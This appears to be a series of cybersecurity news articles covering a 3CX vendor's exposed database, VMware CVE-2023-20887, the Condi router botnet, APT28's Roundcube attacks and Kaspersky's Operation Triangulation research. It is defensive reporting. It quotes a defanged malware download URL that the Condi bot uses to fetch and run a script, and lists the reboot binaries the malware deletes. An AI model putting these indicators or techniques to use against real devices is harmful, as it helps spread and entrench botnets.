A third-party vendor of 3CX, a popular Voice over Internet Protocol (VoIP) comms provider, left an open server and exposed sensitive 3CX data.
The issue went under the company’s radar, even though it was recently targeted by North Korean hackers.
While victims of cyberattacks should not be ridiculed, there’s a reason that sayings like “fool me once, shame on you; fool me twice, shame on me” resonate so well.
Earlier this year, suspected North Korean hackers exploited 3CX for supply-chain attacks, spreading malware to devices using the company’s software.
Despite this prior experience with data breaches, the Cybernews research team recently discovered open Elasticsearch (distributed search and analytics engine) and Kibana (data visualization and exploration tool) instances belonging to a third-party vendor of 3CX. The instances, containing sensitive 3CX data, were discovered on May 15th, nearly two months after the initial attacks became public knowledge.
“The finding suggests that the way 3CX deals with cyberattacks is insufficient since exposed instances were not detected. Meanwhile, skilled attackers could use the data to get back into 3CX networks,” Cybernews researchers said.
We reached out to 3CX for comment but did not receive a reply before publishing this article.
“The finding suggests that the way 3CX deals with cyberattacks is insufficient since exposed instances were not detected. Meanwhile, skilled attackers could use the data to get back into 3CX networks.”Cybernews researchers said.
What 3CX data was exposed?
The exposed instances, which the company closed after we contacted them, contained information attackers could have used to spy on 3CX clients or make preparations for larger, more sophisticated attacks. The open instances exposed:
Call metadata, including time, state, duration, phone number, and email
License keys
Encoded database strings
Attackers can leverage call metadata to develop an intimate picture of the callers’ behavior, deducing who called who and for how long. Additional information could allow them to conclude what was discussed during the calls.
“Moreover, the call metadata can reveal internal company information or even the health of an organization. For example, if there are many sporadic calls, that could signify panic,” Cybernews researchers said.
Meanwhile, exposing software license keys presents a different set of problems. Since they ensure that software is obtained legitimately, attackers can use exposed keys to use 3CX software without paying for it.
In some cases, activating software allows the user to sync data between devices. That way, attackers could access user data simply by installing the software and using a legitimate license key.
However, according to the team, exposing database connection strings poses the biggest danger. Connection strings serve as a set of directions for a program to find the database. Typically, they tell the program where the database is, its type, and how to access it.
“Exposed database connection strings can be exploited in several ways. For example, attackers could use the leaked data to connect to the resource without permission and proceed to read, copy, modify, or delete data stored within that resource,” the team said.
3CX’s safety measures
3CX was recently the victim of a cascading supply chain attack. Researchers at cybersecurity company Mandiant concluded that attackers first distributed malware via software from Trading Technologies, which then affected 3CX software.
Even though the company had to evaluate its security posture, the exposed Kibana and Elasticsearch instances went under the radar. According to the team, the exposed data was accessible since March 30th, 2022, months before the supply chain attack occurred.
Interestingly, after 3CX dealt with the cascading supply chain attack, it released a seven-step security action plan that discussed crucial steps to avoid similar leaks, such as a need to harden its network security, perform pen testing, and set up a new department for network operations and security.
“While taking these steps would contribute to enhanced security, they are either not yet effective or were not followed thoroughly, leaving the company vulnerable,” the team said.
If you want to know more about the disclosure process give a look at the original post:
VMware is warning customers that critical remote code execution vulnerability CVE-2023-20887 is being actively exploited in attacks.
VMware is warning customers that a critical remote code execution vulnerability in Aria Operations for Networks (Formerly vRealize Network Insight), tracked as CVE-2023-20887, is being actively exploited in the wild.
“VMware has confirmed that exploitation of CVE-2023-20887 has occurred in the wild,” reads the advisory.
In early June, Virtualization technology giant VMware released security patches to address three critical and high-severity vulnerabilities, including the flaw CVE-2023-20887.
VMware Aria Operations for Networks (formerly vRealize Network Insight) is a network monitoring tool that helps organizations build an optimized, highly available, and secure network infrastructure.
The vulnerability CVE-2023-20887 (CVSSv3 score of 9.8) is the most severe issue addressed by the company, it is a Command Injection flaw.
“A malicious actor with network access to VMware Aria Operations for Networks may be able to perform a command injection attack resulting in remote code execution.” reads the advisory published by VMware.
GreyNoise CEO Andrew Morris confirmed that the flaw is actively exploited in the wild.
Researchers discovered a new strain of malware called Condi that targets TP-Link Archer AX21 (AX1800) Wi-Fi routers.
Fortinet FortiGuard Labs Researchers discovered a new strain of malware called Condi that was observed exploiting a vulnerability in TP-Link Archer AX21 (AX1800) Wi-Fi routers.
“FortiGuard Labs encountered recent samples of a DDoS-as-a-service botnet calling itself Condi. It attempted to spread by exploiting TP-Link Archer AX21 (AX1800) routers vulnerable to CVE-2023-1389, which was disclosed in mid-March of this year.” reads the report published by Fortinet. “We have additionally observed an increasing number of Condi samples collected from our monitoring systems since the end of May 2023, indicating an active attempt to expand the botnet.”
The CVE-2023-1389 flaw exploited by the bot is a command injection vulnerability. An unauthenticated attacker can trigger the issue to inject commands, which would run as root, sending a simple POST request.
The malware compromises the devices to build a distributed denial-of-service (DDoS) botnet.
The researchers observed a surge in attacks in May 2023.
The threat actor behind the botnet, zxcr9999, advertises its malware on a Telegram channel named Condì Network. The channel was created in May 2022 and the threat actor is using it to offer a DDoS-for-hire service through the botnet and is also offering the source code of the bot for sale.
The bot supports anti-analysis functionalities and is also able to kill processes associate with competing botnets.
The bot propagates using an embedded simple scanner borrowed from Mirai’s original Telnet scanner to scan for any public IPs with open ports 80 or 8080 (commonly used for HTTP servers) and then sends a hardcoded exploitation request. The request allows the bot to download and execute a remote shell script at hxxp://cdn2[.]duc3k[.]com/t which deploys the Condi sample on vulnerable TP-Link Archer AX21 devices.
The sample analyzed by Fortinet only contained the scanner for CVE-2023-1389, however, experts explained that other Condi samples were also spotted exploiting other vulnerabilities to propagate.
The bot doesn’t survive the system restart, for this reason, the author implemented a keep-alive feature to prevent reboot. The mechanism is implemented by deleting multiple binaries that are used to shut down or reboot the system:
/usr/sbin/reboot
/usr/bin/reboot
/usr/sbin/shutdown
/usr/bin/shutdown
/usr/sbin/poweroff
/usr/bin/poweroff
/usr/sbin/halt
/usr/bin/halt
The C2 communication relies on a binary protocol that is a modified version of that initially implemented in the Mirai botnet.
“Malware campaigns, especially botnets, are always looking for ways to expand. Exploiting recently discovered (or published) vulnerabilities has always been one of their favored methods, as we highlighted above for the Condi botnet.” concludes the report.”Thus, it is strongly recommended to always apply the latest security patches and updates as soon as possible.”
Russia-linked APT28 group hacked into Roundcube email servers belonging to multiple Ukrainian organizations.
A joint investigation conducted by Ukraine’s Computer Emergency Response Team (CERT-UA) and Recorded Future revealed that the Russia-linked APT28 group hacked into Roundcube email servers belonging to multiple Ukrainian organizations.
The group operates out of military unity 26165 of the Russian General Staff Main Intelligence Directorate (GRU) 85th Main Special Service Center (GTsSS).
In the recent campaign, the threat actors used news about the ongoing conflict between Russia and Ukraine as bait. The cyber spies sent crafted emails to the target organizations, upon opening the messages Roundcube Webmail vulnerabilities (CVE-2020-35730, CVE-2020-12641, and CVE-2021-44026) were triggered allowing them to hack vulnerable servers.
“during the investigation of the contents of the mailbox of the computer user, an e-mail with the subject “News of Ukraine” was discovered, received on 12.05.2023 from the address “ukraine_news@meta[.]ua”, which contained bait content in the form of an article from the publication “NV” (nv.ua), as well as an exploit for the vulnerability in Roundcube CVE-2020-35730 (XSS) and the corresponding JavaScript code designed to load and run additional JavaScript files: “q.js” and “e.js”.” reads the report published by CERT-UA. “Among the mentioned files, “e.js” provides the creation of a “default filter” filter for redirecting incoming e-mails to a third-party e-mail address, and also performs exfiltration using HTTP POST requests: address book, session values (Cookie) and victim’s e-mail messages.”
BlueDelta Outlook and Roundcube spearphishing infection chain overlap (source Iksikt)
The state-sponsored hackers were able to deploy scripts to redirect the incoming emails to an email address under their control and steal Roundcube data by exploiting an SQLi issue tracked as CVE-2021-44026.
One of the scripts, the “c.js”, was containing an exploit for the CVE-2020-12641 vulnerability.
According to CERT-UA, this campaign targeted more than 40 Ukrainian organizations, including government entities.
The Recorded Future’s Insikt Group believes that the campaign has been active since November 2021.
“Based on the targeting and geopolitical backdrop and the group’s organizational links, the highlighted BlueDelta activity was likely intended to enable military intelligence-gathering to support Russia’s invasion of Ukraine. Infrastructure related to BlueDelta activity has likely been operational since at least November 2021.” states Recorded Future. “This infrastructure was identified by Insikt Group via Recorded Future® Malicious Traffic Analysis (MTA) which surfaced multiple Ukrainian entities, including government institutions, communicating with this BlueDelta infrastructure. Organizations within Ukraine are likely the primary targets of this activity.”
According to Recorded Future researchers, this campaign overlaps with previous APT28 attacks exploiting Microsoft Outlook zero-day tracked as CVE-2023-23397 and aimed at European organizations.
Both reports from CERT-UA and Insikt includes Indicators of Compromise (IoCs) for this campaign.
In early June, the researchers from the Russian firm Kaspersky uncovered a previously unknown APT group that is targeting iOS devices with zero-click exploits as part of a long-running campaign dubbed Operation Triangulation.
The experts discovered the attack while monitoring the network traffic of their own corporate Wi-Fi network dedicated to mobile devices using the Kaspersky Unified Monitoring and Analysis Platform (KUMA).
According to Kaspersky researchers, Operation Triangulation began at least in 2019 and is still ongoing.
The attack chains commenced with a message sent via the iMessage service to an iOS device. The message has an attachment containing an exploit. The expert explained that the message triggers a remote code execution vulnerability without any user interaction (zero-click).
Shortly after Kaspersky’s disclosure, Russia’s FSB accused the US intelligence for the attacks against the iPhones. According to Russian intelligence, thousands of iOS devices belonging to domestic subscribers and diplomatic missions and embassies have been targeted as part of Operation Triangulation.
The operations aimed at gathering intelligence from diplomats from NATO countries, Israel, China and Syria.
FSB believes that Apple supported US intelligence in this cyberespionage campaign.
Kaspersky initially reported that the exploit used in the attack downloads multiple subsequent stages from the C2 server, including additional exploits for privilege escalation. The final payload is downloaded from the same C2 and is described by Kaspersky as a fully-featured APT platform.
Then the initial message and the exploit in the attachment are deleted.
The researchers noticed that the malicious toolset does not support persistence, likely due to the limitations of the OS. The devices may have been reinfected after rebooting.
The attack successfully targeted iOS 15.7, the analysis of the final payload has yet to be finished. The malicious code runs with root privileges, it supports a set of commands for collecting system and user information, and can run arbitrary code downloaded as plugin modules from the C2 server.
Today Kaspersky announced that after a six-month-long investigation, they have completed the collection of all the components of the attack chain and the analysis of the spyware implant, tracked as TriangleDB.
The attackers exploit the implant kernel vulnerability to obtain root privileges on the target iOS device and install the implant. The spyware is directly deployed in memory, but if the victim reboots the device the malware doesn’t persist. In any case, the implant uninstalls itself after 30 days if the system is not rebooted. However, attackers can extend this period.
TriangleDB is written in Objective-C, once executed it connects to the C2 server using the Protobuf library for exchanging data.
The implant configuration contains two servers, the primary one and the fallback.
The messages are encrypted with symmetric (3DES) and asymmetric (RSA) cryptography, they are exchanged via the HTTPS protocol in POST requests
The malware periodically sends heartbeat beacons to the C2, they contain system information such as the implant version, device identifiers (IMEI, MEID, serial number, etc.) and the configuration of the update daemon (whether automatic downloads and installations of updates are enabled).
In turn, the C2 server responds by sending commands to the implant.
“Commands are transferred as Protobuf messages that have type names starting with CRX.” reads the analysis published by Kaspersky. “In total, the implant we analyzed has 24 commands designed for:
Interacting with the filesystem (creation, modification, exfiltration and removal of files);
Interacting with processes (listing and terminating them);
Dumping the victim’s keychain items, which can be useful for harvesting victim credentials;
Monitoring the victim’s geolocation;
Running additional modules, which are Mach-O executables loaded by the implant. These executables are reflectively loaded, with their binaries stored only in memory.
The analysis of the code revealed that the authors refer to string decryption as “unmunging” (as the method performing string decryption is named +[CRConfig unmungeHexString:]. The experts also observed that different entities were given names from database terminology, for this reason, they called the implant TriangleDB:
The researchers also noticed that the class CRConfig, which stores the implant’s configuration, has a method named populateWithFieldsMacOSOnly. The method is not invoked in the iOS implant, but the name suggests the existence of a macOS version of the malware.
Kaspersky is still analyzing this campaign, meantime, they shared indicators of compromise (IoCs) for TriangleDB.
Recently, Kaspersky researchers dug into Operation Triangulation and discovered more details about the exploit chain employed to deliver the spyware to iOS devices. In early June, researchers from the Russian firm Kaspersky uncovered a previously unknown APT group that is targeting iOS devices with zero-click exploits as part of a long-running campaign dubbed Operation Triangulation.
The experts discovered the attack while monitoring the network traffic of their own corporate Wi-Fi network dedicated to mobile devices using the Kaspersky Unified Monitoring and Analysis Platform (KUMA).
According to Kaspersky researchers, Operation Triangulation began at least in 2019 and is still ongoing.
The attack chains commenced with a message sent via the iMessage service to an iOS device. The message has an attachment containing an exploit. The expert explained that the message triggers a remote code execution vulnerability without any user interaction (zero-click).
Below are the description for the two issues addressed by Apple:
CVE-2023-32434 – An integer overflow that resides in the Kernel, it was addressed with improved input validation. An app may can trigger the vulnerability to execute arbitrary code with kernel privileges. Apple is aware of a report that this issue may have been actively exploited against versions of iOS released before iOS 15.7.
CVE-2023-32435 – A memory corruption vulnerability in WebKit that can be exploited to achieve arbitrary code execution when processing specially crafted web content. Apple is aware of a report that this issue may have been actively exploited against versions of iOS released before iOS 15.7.
Both issues have been reported by Georgy Kucherin (@kucher1n), Leonid Bezvershenko (@bzvr_), and Boris Larin (@oct0xor) of Kaspersky.
Today Apple released updates for CVE-2023-32434 (Kernel) and CVE-2023-32435 (WebKit) in-the-wild zero-days which were discovered by us (@kucher1n, @bzvr_ and yours truly) in the #iOSTriangulation attacks. Update your iOS/iPadOS/macOS/watchOS now! pic.twitter.com/w1HxJwq4GO
Another zero-day fixed by Apple, not exploited as part of Operation Triangulation, is an arbitrary code execution tracked as CVE-2023-32439. The company addressed the vulnerability with improved checks.
“Processing maliciously crafted web content may lead to arbitrary code execution. Apple is aware of a report that this issue may have been actively exploited.” reads the advisory published the company.
Login
